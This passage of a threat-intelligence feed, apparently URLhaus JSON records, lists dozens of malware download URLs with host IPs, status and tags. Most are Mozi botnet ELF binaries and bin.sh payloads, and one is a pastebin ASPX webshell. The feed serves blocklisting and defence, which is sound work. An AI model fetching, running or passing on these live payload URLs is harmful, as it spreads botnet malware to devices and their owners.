UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961083","urlhaus_reference":"https://urlhaus.abuse.ch/url/961083/","url":"http://59.94.181.146:40689/Mozi.m","url_status":"offline","host":"59.94.181.146","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961084","urlhaus_reference":"https://urlhaus.abuse.ch/url/961084/","url":"http://58.249.83.3:51123/Mozi.m","url_status":"online","host":"58.249.83.3","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961082","urlhaus_reference":"https://urlhaus.abuse.ch/url/961082/","url":"http://49.77.198.90:52540/Mozi.a","url_status":"online","host":"49.77.198.90","date_added":"2021-01-14 17:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961081","urlhaus_reference":"https://urlhaus.abuse.ch/url/961081/","url":"http://59.96.27.213:56964/Mozi.m","url_status":"offline","host":"59.96.27.213","date_added":"2021-01-14 17:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961078","urlhaus_reference":"https://urlhaus.abuse.ch/url/961078/","url":"http://61.52.62.80:57120/Mozi.m","url_status":"online","host":"61.52.62.80","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961079","urlhaus_reference":"https://urlhaus.abuse.ch/url/961079/","url":"http://58.248.113.219:44518/Mozi.a","url_status":"online","host":"58.248.113.219","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961080","urlhaus_reference":"https://urlhaus.abuse.ch/url/961080/","url":"http://58.249.22.124:50389/Mozi.m","url_status":"online","host":"58.249.22.124","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961077","urlhaus_reference":"https://urlhaus.abuse.ch/url/961077/","url":"http://42.224.241.176:34335/Mozi.m","url_status":"online","host":"42.224.241.176","date_added":"2021-01-14 17:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961069","urlhaus_reference":"https://urlhaus.abuse.ch/url/961069/","url":"http://42.234.234.40:54865/Mozi.m","url_status":"online","host":"42.234.234.40","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961070","urlhaus_reference":"https://urlhaus.abuse.ch/url/961070/","url":"http://27.41.216.92:50773/Mozi.a","url_status":"online","host":"27.41.216.92","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961071","urlhaus_reference":"https://urlhaus.abuse.ch/url/961071/","url":"http://42.237.56.242:52005/Mozi.m","url_status":"online","host":"42.237.56.242","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961072","urlhaus_reference":"https://urlhaus.abuse.ch/url/961072/","url":"http://222.139.126.241:56066/Mozi.m","url_status":"online","host":"222.139.126.241","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961073","urlhaus_reference":"https://urlhaus.abuse.ch/url/961073/","url":"http://222.137.133.120:32915/Mozi.m","url_status":"online","host":"222.137.133.120","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961074","urlhaus_reference":"https://urlhaus.abuse.ch/url/961074/","url":"http://222.137.123.31:43462/Mozi.a","url_status":"online","host":"222.137.123.31","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961075","urlhaus_reference":"https://urlhaus.abuse.ch/url/961075/","url":"http://219.157.163.74:33291/Mozi.m","url_status":"online","host":"219.157.163.74","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961076","urlhaus_reference":"https://urlhaus.abuse.ch/url/961076/","url":"http://220.125.119.222:1440/Mozi.m","url_status":"offline","host":"220.125.119.222","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961068","urlhaus_reference":"https://urlhaus.abuse.ch/url/961068/","url":"http://123.10.35.174:55907/Mozi.a","url_status":"online","host":"123.10.35.174","date_added":"2021-01-14 17:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961066","urlhaus_reference":"https://urlhaus.abuse.ch/url/961066/","url":"http://117.247.201.31:33181/Mozi.a","url_status":"offline","host":"117.247.201.31","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961067","urlhaus_reference":"https://urlhaus.abuse.ch/url/961067/","url":"http://182.121.150.204:44691/Mozi.m","url_status":"online","host":"182.121.150.204","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961059","urlhaus_reference":"https://urlhaus.abuse.ch/url/961059/","url":"http://125.42.26.224:55254/Mozi.m","url_status":"online","host":"125.42.26.224","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961060","urlhaus_reference":"https://urlhaus.abuse.ch/url/961060/","url":"http://186.33.123.24:43010/Mozi.m","url_status":"online","host":"186.33.123.24","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961061","urlhaus_reference":"https://urlhaus.abuse.ch/url/961061/","url":"http://125.41.217.246:37886/Mozi.m","url_status":"offline","host":"125.41.217.246","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961062","urlhaus_reference":"https://urlhaus.abuse.ch/url/961062/","url":"http://182.116.77.111:40153/Mozi.m","url_status":"online","host":"182.116.77.111","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961063","urlhaus_reference":"https://urlhaus.abuse.ch/url/961063/","url":"http://182.117.92.19:34305/Mozi.a","url_status":"online","host":"182.117.92.19","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961064","urlhaus_reference":"https://urlhaus.abuse.ch/url/961064/","url":"http://182.127.97.21:35653/Mozi.m","url_status":"online","host":"182.127.97.21","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961065","urlhaus_reference":"https://urlhaus.abuse.ch/url/961065/","url":"http://117.242.209.98:48908/Mozi.m","url_status":"offline","host":"117.242.209.98","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961058","urlhaus_reference":"https://urlhaus.abuse.ch/url/961058/","url":"http://113.118.12.200:40035/Mozi.m","url_status":"online","host":"113.118.12.200","date_added":"2021-01-14 17:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961055","urlhaus_reference":"https://urlhaus.abuse.ch/url/961055/","url":"http://117.222.166.125:54461/Mozi.a","url_status":"offline","host":"117.222.166.125","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961056","urlhaus_reference":"https://urlhaus.abuse.ch/url/961056/","url":"http://116.75.214.130:51991/Mozi.m","url_status":"offline","host":"116.75.214.130","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961057","urlhaus_reference":"https://urlhaus.abuse.ch/url/961057/","url":"http://112.168.65.51:41143/i","url_status":"online","host":"112.168.65.51","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961054","urlhaus_reference":"https://urlhaus.abuse.ch/url/961054/","url":"http://221.15.254.11:51095/i","url_status":"online","host":"221.15.254.11","date_added":"2021-01-14 17:02:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961053","urlhaus_reference":"https://urlhaus.abuse.ch/url/961053/","url":"http://58.255.142.90:36558/Mozi.a","url_status":"online","host":"58.255.142.90","date_added":"2021-01-14 16:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961050","urlhaus_reference":"https://urlhaus.abuse.ch/url/961050/","url":"http://59.96.37.94:47548/Mozi.m","url_status":"offline","host":"59.96.37.94","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961051","urlhaus_reference":"https://urlhaus.abuse.ch/url/961051/","url":"http://59.97.172.183:35796/Mozi.m","url_status":"offline","host":"59.97.172.183","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961052","urlhaus_reference":"https://urlhaus.abuse.ch/url/961052/","url":"http://58.255.142.229:42765/Mozi.m","url_status":"online","host":"58.255.142.229","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961048","urlhaus_reference":"https://urlhaus.abuse.ch/url/961048/","url":"http://189.51.106.169:37388/Mozi.a","url_status":"offline","host":"189.51.106.169","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961049","urlhaus_reference":"https://urlhaus.abuse.ch/url/961049/","url":"http://222.140.170.6:56849/Mozi.m","url_status":"online","host":"222.140.170.6","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961047","urlhaus_reference":"https://urlhaus.abuse.ch/url/961047/","url":"http://186.33.123.64:35574/Mozi.m","url_status":"online","host":"186.33.123.64","date_added":"2021-01-14 16:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961046","urlhaus_reference":"https://urlhaus.abuse.ch/url/961046/","url":"http://123.10.187.158:46947/Mozi.m","url_status":"online","host":"123.10.187.158","date_added":"2021-01-14 16:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961043","urlhaus_reference":"https://urlhaus.abuse.ch/url/961043/","url":"http://117.192.226.243:34452/Mozi.m","url_status":"offline","host":"117.192.226.243","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961044","urlhaus_reference":"https://urlhaus.abuse.ch/url/961044/","url":"http://119.123.223.174:33017/Mozi.m","url_status":"offline","host":"119.123.223.174","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961045","urlhaus_reference":"https://urlhaus.abuse.ch/url/961045/","url":"http://115.58.133.223:55061/Mozi.m","url_status":"online","host":"115.58.133.223","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961040","urlhaus_reference":"https://urlhaus.abuse.ch/url/961040/","url":"http://115.63.36.66:50046/Mozi.m","url_status":"online","host":"115.63.36.66","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961041","urlhaus_reference":"https://urlhaus.abuse.ch/url/961041/","url":"http://115.56.133.53:51960/Mozi.a","url_status":"online","host":"115.56.133.53","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961042","urlhaus_reference":"https://urlhaus.abuse.ch/url/961042/","url":"http://117.247.203.62:42372/Mozi.m","url_status":"offline","host":"117.247.203.62","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961039","urlhaus_reference":"https://urlhaus.abuse.ch/url/961039/","url":"http://113.88.211.251:51592/Mozi.m","url_status":"offline","host":"113.88.211.251","date_added":"2021-01-14 16:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961038","urlhaus_reference":"https://urlhaus.abuse.ch/url/961038/","url":"http://103.146.233.126:35585/Mozi.a","url_status":"offline","host":"103.146.233.126","date_added":"2021-01-14 16:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961035","urlhaus_reference":"https://urlhaus.abuse.ch/url/961035/","url":"http://115.51.91.178:38398/Mozi.m","url_status":"online","host":"115.51.91.178","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961036","urlhaus_reference":"https://urlhaus.abuse.ch/url/961036/","url":"http://115.55.60.104:59880/Mozi.m","url_status":"online","host":"115.55.60.104","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961037","urlhaus_reference":"https://urlhaus.abuse.ch/url/961037/","url":"http://113.92.158.127:39138/Mozi.a","url_status":"online","host":"113.92.158.127","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961033","urlhaus_reference":"https://urlhaus.abuse.ch/url/961033/","url":"http://221.15.254.11:51095/bin.sh","url_status":"online","host":"221.15.254.11","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961034","urlhaus_reference":"https://urlhaus.abuse.ch/url/961034/","url":"http://115.56.31.76:45117/i","url_status":"online","host":"115.56.31.76","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961032","urlhaus_reference":"https://urlhaus.abuse.ch/url/961032/","url":"http://59.13.193.79:50204/Mozi.m","url_status":"online","host":"59.13.193.79","date_added":"2021-01-14 16:37:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961029","urlhaus_reference":"https://urlhaus.abuse.ch/url/961029/","url":"http://59.93.18.69:45079/Mozi.m","url_status":"offline","host":"59.93.18.69","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961030","urlhaus_reference":"https://urlhaus.abuse.ch/url/961030/","url":"http://59.99.136.43:52238/Mozi.m","url_status":"offline","host":"59.99.136.43","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961031","urlhaus_reference":"https://urlhaus.abuse.ch/url/961031/","url":"http://42.230.66.23:40312/Mozi.m","url_status":"online","host":"42.230.66.23","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961026","urlhaus_reference":"https://urlhaus.abuse.ch/url/961026/","url":"http://59.97.169.179:39002/Mozi.a","url_status":"offline","host":"59.97.169.179","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961027","urlhaus_reference":"https://urlhaus.abuse.ch/url/961027/","url":"http://27.41.216.92:50773/Mozi.m","url_status":"online","host":"27.41.216.92","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961028","urlhaus_reference":"https://urlhaus.abuse.ch/url/961028/","url":"http://59.96.39.140:50050/Mozi.m","url_status":"offline","host":"59.96.39.140","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961024","urlhaus_reference":"https://urlhaus.abuse.ch/url/961024/","url":"http://182.59.203.162:60081/Mozi.m","url_status":"offline","host":"182.59.203.162","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961025","urlhaus_reference":"https://urlhaus.abuse.ch/url/961025/","url":"http://186.33.122.4:58177/Mozi.m","url_status":"online","host":"186.33.122.4","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961023","urlhaus_reference":"https://urlhaus.abuse.ch/url/961023/","url":"http://125.41.164.93:38589/Mozi.m","url_status":"online","host":"125.41.164.93","date_added":"2021-01-14 16:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961022","urlhaus_reference":"https://urlhaus.abuse.ch/url/961022/","url":"http://182.120.42.220:39229/Mozi.a","url_status":"online","host":"182.120.42.220","date_added":"2021-01-14 16:35:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961021","urlhaus_reference":"https://urlhaus.abuse.ch/url/961021/","url":"http://121.181.32.38:53595/Mozi.a","url_status":"offline","host":"121.181.32.38","date_added":"2021-01-14 16:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961018","urlhaus_reference":"https://urlhaus.abuse.ch/url/961018/","url":"http://182.119.207.249:57279/Mozi.m","url_status":"online","host":"182.119.207.249","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961019","urlhaus_reference":"https://urlhaus.abuse.ch/url/961019/","url":"http://182.116.117.139:49019/Mozi.m","url_status":"online","host":"182.116.117.139","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961020","urlhaus_reference":"https://urlhaus.abuse.ch/url/961020/","url":"http://182.121.150.84:48558/Mozi.m","url_status":"offline","host":"182.121.150.84","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961017","urlhaus_reference":"https://urlhaus.abuse.ch/url/961017/","url":"http://120.85.167.142:58913/Mozi.a","url_status":"online","host":"120.85.167.142","date_added":"2021-01-14 16:34:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961016","urlhaus_reference":"https://urlhaus.abuse.ch/url/961016/","url":"http://115.58.68.51:49608/Mozi.m","url_status":"online","host":"115.58.68.51","date_added":"2021-01-14 16:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961013","urlhaus_reference":"https://urlhaus.abuse.ch/url/961013/","url":"http://112.168.65.51:41143/bin.sh","url_status":"online","host":"112.168.65.51","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961014","urlhaus_reference":"https://urlhaus.abuse.ch/url/961014/","url":"http://117.247.204.147:42129/Mozi.m","url_status":"offline","host":"117.247.204.147","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961015","urlhaus_reference":"https://urlhaus.abuse.ch/url/961015/","url":"http://117.247.204.127:47403/Mozi.m","url_status":"offline","host":"117.247.204.127","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961011","urlhaus_reference":"https://urlhaus.abuse.ch/url/961011/","url":"http://120.85.184.207:60187/Mozi.m","url_status":"online","host":"120.85.184.207","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961012","urlhaus_reference":"https://urlhaus.abuse.ch/url/961012/","url":"http://117.202.70.191:46097/Mozi.m","url_status":"offline","host":"117.202.70.191","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961010","urlhaus_reference":"https://urlhaus.abuse.ch/url/961010/","url":"http://211.223.74.229:50771/i","url_status":"online","host":"211.223.74.229","date_added":"2021-01-14 16:31:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961009","urlhaus_reference":"https://urlhaus.abuse.ch/url/961009/","url":"https://pastebin.com/raw/00aUJCLx","url_status":"offline","host":"pastebin.com","date_added":"2021-01-14 16:29:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"pmelson","larted":"false","tags":["ASPXShell","webshell"]} +{"id":"961008","urlhaus_reference":"https://urlhaus.abuse.ch/url/961008/","url":"http://115.56.31.76:45117/bin.sh","url_status":"online","host":"115.56.31.76","date_added":"2021-01-14 16:25:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961007","urlhaus_reference":"https://urlhaus.abuse.ch/url/961007/","url":"http://49.68.80.149:41485/Mozi.a","url_status":"online","host":"49.68.80.149","date_added":"2021-01-14 16:22:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961006","urlhaus_reference":"https://urlhaus.abuse.ch/url/961006/","url":"http://61.52.164.52:43851/Mozi.m","url_status":"online","host":"61.52.164.52","date_added":"2021-01-14 16:22:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961005","urlhaus_reference":"https://urlhaus.abuse.ch/url/961005/","url":"http://59.95.174.179:37095/Mozi.m","url_status":"offline","host":"59.95.174.179","date_added":"2021-01-14 16:22:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961004","urlhaus_reference":"https://urlhaus.abuse.ch/url/961004/","url":"http://58.249.18.32:59275/Mozi.m","url_status":"online","host":"58.249.18.32","date_added":"2021-01-14 16:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961002","urlhaus_reference":"https://urlhaus.abuse.ch/url/961002/","url":"http://83.224.148.209:46131/Mozi.m","url_status":"offline","host":"83.224.148.209","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961003","urlhaus_reference":"https://urlhaus.abuse.ch/url/961003/","url":"http://59.99.93.203:40129/Mozi.m","url_status":"offline","host":"59.99.93.203","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not 